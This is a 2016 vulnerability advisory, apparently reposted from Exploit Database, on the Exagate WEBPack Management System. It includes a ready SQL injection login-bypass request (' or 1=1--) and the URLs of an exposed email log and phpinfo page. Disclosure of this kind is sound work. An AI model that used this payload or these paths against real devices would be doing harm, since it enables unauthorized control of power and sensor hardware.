Exagate WEBPack Management System – Multiple Vulnerabilities

• Exploit Database
• 129 阅读

• 作者： Halil Dalabasmaz
  日期： 2016-10-06
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/40474/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101

  Document Title: ================ Exagate WEBpack Management System Multiple Vulnerabilities   Author: ======== Halil Dalabasmaz   Release Date: ============== 07 OCT 2016   Product & Service Introduction: ================================ WEBPack is the individual built-in user-friendly and skilled web interface allowing web-based access to the main units of the SYSGuard and POWERGuard series. The advanced software enables the users to design their customized dashboard smoothly for a detailed monitoring and management of all the power outlet sockets & sensor and volt free contact ports, as well as relay outputs. User definition and authorization, remote access and update, detailed reporting and archiving are among the many features. Vendor Homepage: ================= http://www.exagate.com/   Vulnerability Information: =========================== Exagate company uses WEBPack Management System software on the hardware. The software is web-based and it is provide control on the hardware. There are multiple vulnerabilities on that software.   Vulnerability #1: SQL Injection ================================   There is no any filtering or validation mechanisim on "login.php". "username" and "password" inputs are vulnerable to SQL Injection attacks. Sample POST request is given below.   POST /login.php HTTP/1.1 Host: <TARGET HOST> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 37   username=root&password=&apos; or 1=1--   Vulnerability #2: Unauthorized Access To Sensetive Information ===============================================================   The software is capable of sending e-mail to system admins. But there is no any authorization mechanism to access e-mail logs. The e-mail logs can accessable anonymously from "http://<TARGET HOST>/emaillog.txt".   Vulnerability #3: Unremoved Configuration Files ================================================   The software contains the PHP Info file on the following URL.   http://<TARGET HOST>/api/phpinfo.php   Vulnerability Disclosure Timeline: ================================== 03 OCT 2016 - Attempted to contact vendor after discovery of vulnerabilities 06 OCT 2016 - No response from vendor and re-attempted to contact vendor 07 OCT 2016 - No response from vendor 07 OCT 2016 - Public Disclosure Discovery Status: ================== Published Affected Product(s): ===================== Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities)   Tested On: =========== Exagate SYSGuard 3001   Disclaimer & Information: ========================== The information provided in this advisory is provided as it is without any warranty. BGA disclaims allwarranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.   Domain: www.bgasecurity.com Social: twitter.com/bgasecurity Contact:advisory@bga.com.tr   Copyright © 2016 | BGA Security LLC